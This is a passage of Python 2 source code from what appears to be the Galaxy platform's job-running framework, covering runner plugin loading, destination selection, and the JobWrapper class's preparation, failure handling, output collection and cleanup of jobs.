* Tool shed id less version: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool``
* Tool config tool id: ``filter_tool``
"""
rval = []
# listify if ids is a single (string) id
ids = util.listify(ids)
for id in ids:
if id in self.tools:
# If a tool has definitions that include job params but not a
# definition for jobs without params, include the default
# config
for job_tool_configuration in self.tools[id]:
if not job_tool_configuration.params:
break
else:
rval.append(self.default_job_tool_configuration)
rval.extend(self.tools[id])
break
else:
rval.append(self.default_job_tool_configuration)
return rval
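    # Example of the resolution above (hypothetical ids):
    #   get_job_tool_configurations(['toolshed.example.org/repos/nate/filter_tool_repo/filter_tool/1.0.0',
    #                                'filter_tool'])
    # returns the configurations for the first id found in self.tools; if that
    # id only has param-specific configurations, the default
    # JobToolConfiguration is prepended. If none of the ids are configured,
    # only the default is returned.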
def __get_single_item(self, collection):
"""Given a collection of handlers or destinations, return one item from the collection at random.
"""
        # Avoid the random module when there is only one item, on the assumption that skipping it is faster
if len(collection) == 1:
return collection[0]
else:
return random.choice(collection)
# This is called by Tool.get_job_handler()
def get_handler(self, id_or_tag):
"""Given a handler ID or tag, return the provided ID or an ID matching the provided tag
:param id_or_tag: A handler ID or tag.
:type id_or_tag: str
:returns: str -- A valid job handler ID.
"""
if id_or_tag is None:
id_or_tag = self.default_handler_id
return self.__get_single_item(self.handlers[id_or_tag])
def get_destination(self, id_or_tag):
"""Given a destination ID or tag, return the JobDestination matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: JobDestination -- A valid destination
Destinations are deepcopied as they are expected to be passed in to job
runners, which will modify them for persisting params set at runtime.
"""
if id_or_tag is None:
id_or_tag = self.default_destination_id
return copy.deepcopy(self.__get_single_item(self.destinations[id_or_tag]))
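    # Example of tag vs. id resolution (hypothetical entries): with
    #   self.destinations == {'cluster': [dest_a, dest_b], 'local': (dest_l,)}
    # get_destination('cluster') deep-copies one of dest_a/dest_b at random,
    # while get_destination('local') always returns a copy of dest_l.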
def get_destinations(self, id_or_tag):
"""Given a destination ID or tag, return all JobDestinations matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: list or tuple of JobDestinations
Destinations are not deepcopied, so they should not be passed to
anything which might modify them.
"""
return self.destinations.get(id_or_tag, None)
def get_job_runner_plugins(self, handler_id):
"""Load all configured job runner plugins
        :returns: dict of job runner plugins keyed by runner id
"""
rval = {}
if handler_id in self.handler_runner_plugins:
plugins_to_load = [ rp for rp in self.runner_plugins if rp['id'] in self.handler_runner_plugins[handler_id] ]
log.info( "Handler '%s' will load specified runner plugins: %s", handler_id, ', '.join( [ rp['id'] for rp in plugins_to_load ] ) )
else:
plugins_to_load = self.runner_plugins
log.info( "Handler '%s' will load all configured runner plugins", handler_id )
for runner in plugins_to_load:
class_names = []
module = None
id = runner['id']
load = runner['load']
if ':' in load:
# Name to load was specified as '<module>:<class>'
module_name, class_name = load.rsplit(':', 1)
class_names = [ class_name ]
module = __import__( module_name )
else:
# Name to load was specified as '<module>'
if '.' not in load:
# For legacy reasons, try from galaxy.jobs.runners first if there's no '.' in the name
module_name = 'galaxy.jobs.runners.' + load
try:
module = __import__( module_name )
except ImportError:
# No such module, we'll retry without prepending galaxy.jobs.runners.
# All other exceptions (e.g. something wrong with the module code) will raise
pass
if module is None:
# If the name included a '.' or loading from the static runners path failed, try the original name
module = __import__( load )
module_name = load
if module is None:
# Module couldn't be loaded, error should have already been displayed
continue
for comp in module_name.split( "." )[1:]:
module = getattr( module, comp )
if not class_names:
# If there's not a ':', we check <module>.__all__ for class names
try:
assert module.__all__
class_names = module.__all__
except AssertionError:
log.error( 'Runner "%s" does not contain a list of exported classes in __all__' % load )
continue
for class_name in class_names:
runner_class = getattr( module, class_name )
try:
assert issubclass(runner_class, BaseJobRunner)
except TypeError:
log.warning("A non-class name was found in __all__, ignoring: %s" % id)
continue
except AssertionError:
log.warning("Job runner classes must be subclassed from BaseJobRunner, %s has bases: %s" % (id, runner_class.__bases__))
continue
try:
rval[id] = runner_class( self.app, runner[ 'workers' ], **runner.get( 'kwds', {} ) )
except TypeError:
log.exception( "Job runner '%s:%s' has not been converted to a new-style runner or encountered TypeError on load" % ( module_name, class_name ) )
rval[id] = runner_class( self.app )
log.debug( "Loaded job runner '%s:%s' as '%s'" % ( module_name, class_name, id ) )
return rval
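    # Illustration of the 'load' formats handled above (the module and class
    # names on the second line are hypothetical):
    #   load="local"                             -> galaxy.jobs.runners.local, classes from __all__
    #   load="my_package.my_module:MyJobRunner"  -> explicit module and class
    # Loaded classes must subclass BaseJobRunner and are instantiated as
    # runner_class(self.app, workers, **kwds).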
def is_id(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == tuple
def is_tag(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == list
def is_handler(self, server_name):
"""Given a server name, indicate whether the server is a job handler
:param server_name: The name to check
:type server_name: str
:return: bool
"""
for collection in self.handlers.values():
if server_name in collection:
return True
return False
def convert_legacy_destinations(self, job_runners):
"""Converts legacy (from a URL) destinations to contain the appropriate runner params defined in the URL.
:param job_runners: All loaded job runner plugins.
:type job_runners: list of job runner plugins
"""
for id, destination in [ ( id, destinations[0] ) for id, destinations in self.destinations.items() if self.is_id(destinations) ]:
# Only need to deal with real destinations, not members of tags
if destination.legacy and not destination.converted:
if destination.runner in job_runners:
destination.params = job_runners[destination.runner].url_to_destination(destination.url).params
destination.converted = True
if destination.params:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
for k, v in destination.params.items():
log.debug(" %s: %s" % (k, v))
else:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
else:
log.warning("Legacy destination with id '%s' could not be converted: Unknown runner plugin: %s" % (id, destination.runner))
class JobWrapper( object ):
"""
Wraps a 'model.Job' with convenience methods for running processes and
state management.
"""
def __init__( self, job, queue, use_persisted_destination=False ):
self.job_id = job.id
self.session_id = job.session_id
self.user_id = job.user_id
self.tool = queue.app.toolbox.tools_by_id.get( job.tool_id, None )
self.queue = queue
self.app = queue.app
self.sa_session = self.app.model.context
self.extra_filenames = []
self.command_line = None
# Tool versioning variables
self.write_version_cmd = None
self.version_string = ""
self.galaxy_lib_dir = None
# With job outputs in the working directory, we need the working
# directory to be set before prepare is run, or else premature deletion
# and job recovery fail.
# Create the working dir if necessary
try:
self.app.object_store.create(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
self.working_directory = self.app.object_store.get_filename(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
log.debug('(%s) Working directory for job is: %s' % (self.job_id, self.working_directory))
except ObjectInvalid:
raise Exception('Unable to create job working directory, job failure')
self.dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.output_paths = None
self.output_hdas_and_paths = None
self.tool_provided_job_metadata = None
# Wrapper holding the info required to restore and clean up from files used for setting metadata externally
self.external_output_metadata = metadata.JobExternalOutputMetadataWrapper( job )
self.job_runner_mapper = JobRunnerMapper( self, queue.dispatcher.url_to_destination, self.app.job_config )
self.params = None
if job.params:
self.params = from_json_string( job.params )
if use_persisted_destination:
self.job_runner_mapper.cached_job_destination = JobDestination( from_job=job )
self.__user_system_pwent = None
self.__galaxy_system_pwent = None
def _job_dataset_path_rewriter( self, working_directory ):
if self.app.config.outputs_to_working_directory:
dataset_path_rewriter = OutputsToWorkingDirectoryPathRewriter( working_directory )
else:
dataset_path_rewriter = NullDatasetPathRewriter( )
return dataset_path_rewriter
def can_split( self ):
# Should the job handler split this job up?
return self.app.config.use_tasked_jobs and self.tool.parallelism
def get_job_runner_url( self ):
log.warning('(%s) Job runner URLs are deprecated, use destinations instead.' % self.job_id)
return self.job_destination.url
def get_parallelism(self):
return self.tool.parallelism
# legacy naming
get_job_runner = get_job_runner_url
@property
def job_destination(self):
"""Return the JobDestination that this job will use to run. This will
either be a configured destination, a randomly selected destination if
the configured destination was a tag, or a dynamically generated
destination from the dynamic runner.
Calling this method for the first time causes the dynamic runner to do
its calculation, if any.
:returns: ``JobDestination``
"""
return self.job_runner_mapper.get_job_destination(self.params)
def get_job( self ):
return self.sa_session.query( model.Job ).get( self.job_id )
def get_id_tag(self):
        # For compatibility with drmaa (which uses job_id right now) and TaskWrapper
return self.get_job().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.get_job()
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def get_version_string_path( self ):
return os.path.abspath(os.path.join(self.app.config.new_file_path, "GALAXY_VERSION_STRING_%s" % self.job_id))
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
self.sa_session.expunge_all() # this prevents the metadata reverting that has been seen in conjunction with the PBS job runner
if not os.path.exists( self.working_directory ):
os.mkdir( self.working_directory )
job = self._load_job()
def get_special( ):
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
if not special:
special = self.sa_session.query( model.GenomeIndexToolData ).filter_by( job=job ).first()
return special
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment, get_special=get_special )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
job.command_line = self.command_line
self.sa_session.add( job )
self.sa_session.flush()
# Return list of all extra files
self.param_dict = tool_evaluator.param_dict
version_string_cmd = self.tool.version_string_cmd
if version_string_cmd:
self.write_version_cmd = "%s > %s 2>&1" % ( version_string_cmd, compute_environment.version_path() )
else:
self.write_version_cmd = None
return self.extra_filenames
def default_compute_environment( self, job=None ):
if not job:
job = self.get_job()
return SharedComputeEnvironment( self, job )
def _load_job( self ):
# Load job from database and verify it has user or session.
# Restore parameters from the database
job = self.get_job()
if job.user is None and job.galaxy_session is None:
raise Exception( 'Job %s has no user and no session.' % job.id )
return job
def _get_tool_evaluator( self, job ):
        # Hacky way to avoid a circular import for now.
        # Placing ToolEvaluator in either jobs or tools
        # results in a circular dependency.
from galaxy.tools.evaluation import ToolEvaluator
tool_evaluator = ToolEvaluator(
app=self.app,
job=job,
tool=self.tool,
local_working_directory=self.working_directory,
)
return tool_evaluator
def fail( self, message, exception=False, stdout="", stderr="", exit_code=None ):
"""
Indicate job failure by setting state and message on all output
datasets.
"""
job = self.get_job()
self.sa_session.refresh( job )
# if the job was deleted, don't fail it
if not job.state == job.states.DELETED:
# Check if the failure is due to an exception
if exception:
# Save the traceback immediately in case we generate another
# below
job.traceback = traceback.format_exc()
# Get the exception and let the tool attempt to generate
# a better message
etype, evalue, tb = sys.exc_info()
m = self.tool.handle_job_failure_exception( evalue )
if m:
message = m
if self.app.config.outputs_to_working_directory:
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "fail(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ), e:
log.error( "fail(): Missing output file in working directory: %s" % e )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = dataset.states.ERROR
dataset.blurb = 'tool error'
dataset.info = message
dataset.set_size()
dataset.dataset.set_total_size()
dataset.mark_unhidden()
if dataset.ext == 'auto':
dataset.extension = 'data'
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
self.sa_session.add( dataset )
self.sa_session.flush()
job.state = job.states.ERROR
job.command_line = self.command_line
job.info = message
# TODO: Put setting the stdout, stderr, and exit code in one place
# (not duplicated with the finish method).
if ( len( stdout ) > DATABASE_MAX_STRING_SIZE ):
stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = stdout
if ( len( stderr ) > DATABASE_MAX_STRING_SIZE ):
stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = stderr
# Let the exit code be Null if one is not provided:
if ( exit_code != None ):
job.exit_code = exit_code
self.sa_session.add( job )
self.sa_session.flush()
#Perform email action even on failure.
for pja in [pjaa.post_job_action for pjaa in job.post_job_actions if pjaa.post_job_action.action_type == "EmailAction"]:
ActionBox.execute(self.app, self.sa_session, pja, job)
# If the job was deleted, call tool specific fail actions (used for e.g. external metadata) and clean up
if self.tool:
self.tool.job_failed( self, message, exception )
delete_files = self.app.config.cleanup_job == 'always' or (self.app.config.cleanup_job == 'onsuccess' and job.state == job.states.DELETED)
self.cleanup( delete_files=delete_files )
def pause( self, job=None, message=None ):
if job is None:
job = self.get_job()
if message is None:
message = "Execution of this dataset's job is paused"
if job.state == job.states.NEW:
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = dataset_assoc.dataset.dataset.states.PAUSED
dataset_assoc.dataset.info = message
self.sa_session.add( dataset_assoc.dataset )
job.state = job.states.PAUSED
self.sa_session.add( job )
def mark_as_resubmitted( self ):
job = self.get_job()
self.sa_session.refresh( job )
# TODO: Enable this code once a UI for resubmitted datasets exists
#for dataset in [ dataset_assoc.dataset for dataset_assoc in job.output_datasets + job.output_library_datasets ]:
# dataset._state = model.Dataset.states.RESUBMITTED
# self.sa_session.add( dataset )
job.state = model.Job.states.RESUBMITTED
self.sa_session.add( job )
self.sa_session.flush()
def change_state( self, state, info=False ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = state
if info:
dataset.info = info
self.sa_session.add( dataset )
self.sa_session.flush()
if info:
job.info = info
job.state = state
self.sa_session.add( job )
self.sa_session.flush()
def get_state( self ):
job = self.get_job()
self.sa_session.refresh( job )
return job.state
def set_runner( self, runner_url, external_id ):
log.warning('set_runner() is deprecated, use set_job_destination()')
self.set_job_destination(self.job_destination, external_id)
def set_job_destination( self, job_destination, external_id=None ):
"""
Persist job destination params in the database for recovery.
self.job_destination is not used because a runner may choose to rewrite
parts of the destination (e.g. the params).
"""
job = self.get_job()
self.sa_session.refresh(job)
log.debug('(%s) Persisting job destination (destination id: %s)' % (job.id, job_destination.id))
job.destination_id = job_destination.id
job.destination_params = job_destination.params
job.job_runner_name = job_destination.runner
job.job_runner_external_id = external_id
self.sa_session.add(job)
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None, remote_working_directory=None ):
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# default post job setup
self.sa_session.expunge_all()
job = self.get_job()
# TODO: After failing here, consider returning from the function.
try:
self.reclaim_ownership()
except:
log.exception( '(%s) Failed to change ownership of %s, failing' % ( job.id, self.working_directory ) )
return self.fail( job.info, stdout=stdout, stderr=stderr, exit_code=tool_exit_code )
# if the job was deleted, don't finish it
if job.state == job.states.DELETED or job.state == job.states.ERROR:
# SM: Note that, at this point, the exit code must be saved in case
# there was an error. Errors caught here could mean that the job
# was deleted by an administrator (based on old comments), but it
# could also mean that a job was broken up into tasks and one of
# the tasks failed. So include the stderr, stdout, and exit code:
return self.fail( job.info, stderr=stderr, stdout=stdout, exit_code=tool_exit_code )
# Check the tool's stdout, stderr, and exit code for errors, but only
# if the job has not already been marked as having an error.
# The job's stdout and stderr will be set accordingly.
# We set final_job_state to use for dataset management, but *don't* set
# job.state until after dataset collection to prevent history issues
if ( self.check_tool_output( stdout, stderr, tool_exit_code, job ) ):
final_job_state = job.states.OK
else:
final_job_state = job.states.ERROR
if self.write_version_cmd:
version_filename = self.get_version_string_path()
if os.path.exists(version_filename):
self.version_string = open(version_filename).read()
os.unlink(version_filename)
if self.app.config.outputs_to_working_directory and not self.__link_file_check():
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "finish(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ):
# this can happen if Galaxy is restarted during the job's
# finish method - the false_path file has already moved,
# and when the job is recovered, it won't be found.
if os.path.exists( dataset_path.real_path ) and os.stat( dataset_path.real_path ).st_size > 0:
log.warning( "finish(): %s not found, but %s is not empty, so it will be used instead" % ( dataset_path.false_path, dataset_path.real_path ) )
else:
# Prior to fail we need to set job.state
job.state = final_job_state
return self.fail( "Job %s's output dataset(s) could not be read" % job.id )
job_context = ExpressionContext( dict( stdout=job.stdout, stderr=job.stderr ) )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
context = self.get_dataset_finish_context( job_context, dataset_assoc.dataset.dataset )
            # should this also be checking library associations? - can a library item be added from a history before the job has ended? - let's not allow this to occur
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations: # need to update all associated output hdas, i.e. history was shared with job running
trynum = 0
while trynum < self.app.config.retry_job_output_collection:
try:
# Attempt to short circuit NFS attribute caching
os.stat( dataset.dataset.file_name )
os.chown( dataset.dataset.file_name, os.getuid(), -1 )
trynum = self.app.config.retry_job_output_collection
except ( OSError, ObjectNotFound ), e:
trynum += 1
log.warning( 'Error accessing %s, will retry: %s', dataset.dataset.file_name, e )
time.sleep( 2 )
if getattr( dataset, "hidden_beneath_collection_instance", None ):
dataset.visible = False
dataset.blurb = 'done'
dataset.peek = 'no peek'
dataset.info = (dataset.info or '')
if context['stdout'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stdout'].strip()
if context['stderr'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stderr'].strip()
dataset.tool_version = self.version_string
dataset.set_size()
if 'uuid' in context:
dataset.dataset.uuid = context['uuid']
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
if job.states.ERROR == final_job_state:
dataset.blurb = "error"
dataset.mark_unhidden()
elif dataset.has_data():
# If the tool was expected to set the extension, attempt to retrieve it
if dataset.ext == 'auto':
dataset.extension = context.get( 'ext', 'data' )
dataset.init_meta( copy_from=dataset )
#if a dataset was copied, it won't appear in our dictionary:
#either use the metadata from originating output dataset, or call set_meta on the copies
#it would be quicker to just copy the metadata from the originating output dataset,
#but somewhat trickier (need to recurse up the copied_from tree), for now we'll call set_meta()
if ( not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and self.app.config.retry_metadata_internally ):
dataset.datatype.set_meta( dataset, overwrite=False ) # call datatype.set_meta directly for the initial set_meta call during dataset creation
elif not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and job.states.ERROR != final_job_state:
dataset._state = model.Dataset.states.FAILED_METADATA
else:
#load metadata from file
#we need to no longer allow metadata to be edited while the job is still running,
#since if it is edited, the metadata changed on the running output will no longer match
#the metadata that was stored to disk for use via the external process,
#and the changes made by the user will be lost, without warning or notice
output_filename = self.external_output_metadata.get_output_filenames_by_dataset( dataset, self.sa_session ).filename_out
def path_rewriter( path ):
if not remote_working_directory or not path:
return path
normalized_remote_working_directory = os.path.normpath( remote_working_directory )
normalized_path = os.path.normpath( path )
if normalized_path.startswith( normalized_remote_working_directory ):
return normalized_path.replace( normalized_remote_working_directory, self.working_directory, 1 )
return path
dataset.metadata.from_JSON_dict( output_filename, path_rewriter=path_rewriter )
try:
assert context.get( 'line_count', None ) is not None
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( line_count=context['line_count'], is_multi_byte=True )
else:
dataset.set_peek( line_count=context['line_count'] )
except:
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( is_multi_byte=True )
else:
dataset.set_peek()
try:
# set the name if provided by the tool
dataset.name = context['name']
except:
pass
else:
dataset.blurb = "empty"
if dataset.ext == 'auto':
dataset.extension = 'txt'
self.sa_session.add( dataset )
if job.states.ERROR == final_job_state:
log.debug( "setting dataset state to ERROR" )
# TODO: This is where the state is being set to error. Change it!
dataset_assoc.dataset.dataset.state = model.Dataset.states.ERROR
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset_assoc.dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
else:
dataset_assoc.dataset.dataset.state = model.Dataset.states.OK
# If any of the rest of the finish method below raises an
# exception, the fail method will run and set the datasets to
# ERROR. The user will never see that the datasets are in error if
# they were flushed as OK here, since upon doing so, the history
# panel stops checking for updates. So allow the
                # self.sa_session.flush() at the bottom of this method to set
# the state instead.
for pja in job.post_job_actions:
ActionBox.execute(self.app, self.sa_session, pja.post_job_action, job)
# Flush all the dataset and job changes above. Dataset state changes
# will now be seen by the user.
self.sa_session.flush()
# Save stdout and stderr
if len( job.stdout ) > DATABASE_MAX_STRING_SIZE:
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = util.shrink_string_by_size( job.stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( job.stderr ) > DATABASE_MAX_STRING_SIZE:
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = util.shrink_string_by_size( job.stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
# The exit code will be null if there is no exit code to be set.
# This is so that we don't assign an exit code, such as 0, that
# is either incorrect or has the wrong semantics.
if None != tool_exit_code:
job.exit_code = tool_exit_code
# custom post process setup
inp_data = dict( [ ( da.name, da.dataset ) for da in job.input_datasets ] )
out_data = dict( [ ( da.name, da.dataset ) for da in job.output_datasets ] )
inp_data.update( [ ( da.name, da.dataset ) for da in job.input_library_datasets ] )
out_data.update( [ ( da.name, da.dataset ) for da in job.output_library_datasets ] )
input_ext = 'data'
for _, data in inp_data.items():
            # For loop is odd, but sort of simulates the behavior in galaxy.tools.actions
if not data:
continue
input_ext = data.ext
        param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )  # why not re-use self.param_dict here? Probably should; this causes tools.parameters.basic.UnvalidatedValue to be used in the following methods instead of validated and transformed values when e.g. running workflows
param_dict = self.tool.params_from_strings( param_dict, self.app )
# Check for and move associated_files
self.tool.collect_associated_files(out_data, self.working_directory)
# Create generated output children and primary datasets and add to param_dict
collected_datasets = {
'children': self.tool.collect_child_datasets(out_data, self.working_directory),
'primary': self.tool.collect_primary_datasets(out_data, self.working_directory, input_ext)
}
param_dict.update({'__collected_datasets__': collected_datasets})
# Certain tools require tasks to be completed after job execution
# ( this used to be performed in the "exec_after_process" hook, but hooks are deprecated ).
self.tool.exec_after_process( self.queue.app, inp_data, out_data, param_dict, job=job )
# Call 'exec_after_process' hook
self.tool.call_hook( 'exec_after_process', self.queue.app, inp_data=inp_data,
out_data=out_data, param_dict=param_dict,
tool=self.tool, stdout=job.stdout, stderr=job.stderr )
job.command_line = self.command_line
bytes = 0
# Once datasets are collected, set the total dataset size (includes extra files)
for dataset_assoc in job.output_datasets:
dataset_assoc.dataset.dataset.set_total_size()
bytes += dataset_assoc.dataset.dataset.get_total_size()
if job.user:
job.user.total_disk_usage += bytes
# fix permissions
for path in [ dp.real_path for dp in self.get_mutable_output_fnames() ]:
util.umask_fix_perms( path, self.app.config.umask, 0666, self.app.config.gid )
# Finally set the job state. This should only happen *after* all
# dataset creation, and will allow us to eliminate force_history_refresh.
job.state = final_job_state
if not job.tasks:
            # If the job was composed of tasks, don't attempt to recollect statistics
self._collect_metrics( job )
self.sa_session.flush()
log.debug( 'job %d ended' % self.job_id )
delete_files = self.app.config.cleanup_job == 'always' or ( job.state == job.states.OK and self.app.config.cleanup_job == 'onsuccess' )
self.cleanup( delete_files=delete_files )
def check_tool_output( self, stdout, stderr, tool_exit_code, job ):
return check_output( self.tool, stdout, stderr, tool_exit_code, job )
def cleanup( self, delete_files=True ):
        # At least one of these tool cleanup actions (job import) is needed
        # for the tool to work properly, which is why one might want to run
        # cleanup but not delete files.
try:
if delete_files:
for fname in self.extra_filenames:
os.remove( fname )
self.external_output_metadata.cleanup_external_metadata( self.sa_session )
galaxy.tools.imp_exp.JobExportHistoryArchiveWrapper( self.job_id ).cleanup_after_job( self.sa_session )
galaxy.tools.imp_exp.JobImportHistoryArchiveWrapper( self.app, self.job_id ).cleanup_after_job()
if delete_files:
self.app.object_store.delete(self.get_job(), base_dir='job_work', entire_dir=True, dir_only=True, extra_dir=str(self.job_id))
except:
log.exception( "Unable to cleanup job %d" % self.job_id )
def _collect_metrics( self, has_metrics ):
job = has_metrics.get_job()
per_plugin_properties = self.app.job_metrics.collect_properties( job.destination_id, self.job_id, self.working_directory )
if per_plugin_properties:
log.info( "Collecting job metrics for %s" % has_metrics )
for plugin, properties in per_plugin_properties.iteritems():
for metric_name, metric_value in properties.iteritems():
if metric_value is not None:
has_metrics.add_metric( plugin, metric_name, metric_value )
def get_output_sizes( self ):
sizes = []
output_paths = self.get_output_fnames()
for outfile in [ str( o ) for o in output_paths ]:
if os.path.exists( outfile ):
sizes.append( ( outfile, os.stat( outfile ).st_size ) )
else:
sizes.append( ( outfile, 0 ) )
return sizes
def check_limits(self, runtime=None):
if self.app.job_config.limits.output_size > 0:
for outfile, size in self.get_output_sizes():
if size > self.app.job_config.limits.output_size:
log.warning( '(%s) Job output size %s has exceeded the global output size limit', self.get_id_tag(), os.path.basename( outfile ) )
return JobState.runner_states.OUTPUT_SIZE_LIMIT, 'Job output file grew too large (greater than %s), please try different inputs or parameters' % util.nice_size( self.app.job_config.limits.output_size )
if self.app.job_config.limits.walltime_delta is not None and runtime is not None:
if runtime > self.app.job_config.limits.walltime_delta:
log.warning( '(%s) Job runtime %s has exceeded the global walltime, it will be terminated', self.get_id_tag(), runtime )
return JobState.runner_states.GLOBAL_WALLTIME_REACHED, 'Job ran longer than the maximum allowed execution time (runtime: %s, limit: %s), please try different inputs or parameters' % ( str(runtime).split('.')[0], self.app.job_config.limits.walltime )
return None
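    # Sketch of the checks above (hypothetical limit values): with
    # limits.output_size == 10 * 1024**3 and limits.walltime == '24:00:00',
    # an output file larger than 10 GB yields
    # (JobState.runner_states.OUTPUT_SIZE_LIMIT, <message>), a runtime over
    # 24 hours yields (JobState.runner_states.GLOBAL_WALLTIME_REACHED,
    # <message>), and otherwise check_limits() returns None.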
def has_limits( self ):
has_output_limit = self.app.job_config.limits.output_size > 0
has_walltime_limit = self.app.job_config.limits.walltime_delta is not None
return has_output_limit or has_walltime_limit
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_env_setup_clause( self ):
if self.app.config.environment_setup_file is None:
return ''
return '[ -f "%s" ] && . %s' % ( self.app.config.environment_setup_file, self.app.config.environment_setup_file )
def get_input_dataset_fnames( self, ds ):
        filenames = [ ds.file_name ]
#we will need to stage in metadata file names also
#TODO: would be better to only stage in metadata files that are actually needed (found in command line, referenced in config files, etc.)
for key, value in ds.metadata.items():
if isinstance( value, model.MetadataFile ):
filenames.append( value.file_name )
return filenames
def get_input_fnames( self ):
job = self.get_job()
filenames = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames.extend(self.get_input_dataset_fnames(da.dataset))
return filenames
def get_input_paths( self, job=None ):
if job is None:
job = self.get_job()
paths = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames = self.get_input_dataset_fnames(da.dataset)
for real_path in filenames:
false_path = self.dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'input' )
paths.append( DatasetPath( da.id, real_path=real_path, false_path=false_path, mutable=False ) )
return paths
def get_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return self.output_paths
def get_mutable_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return filter( lambda dsp: dsp.mutable, self.output_paths )
def get_output_hdas_and_fnames( self ):
if self.output_hdas_and_paths is None:
self.compute_outputs()
return self.output_hdas_and_paths
    def compute_outputs( self ):
dataset_path_rewriter = self.dataset_path_rewriter
job = self.get_job()
# Job output datasets are combination of history, library, and jeha datasets.
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
false_path = None
results = []
for da in job.output_datasets + job.output_library_datasets:
da_false_path = dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'output' )
mutable = da.dataset.dataset.external_filename is None
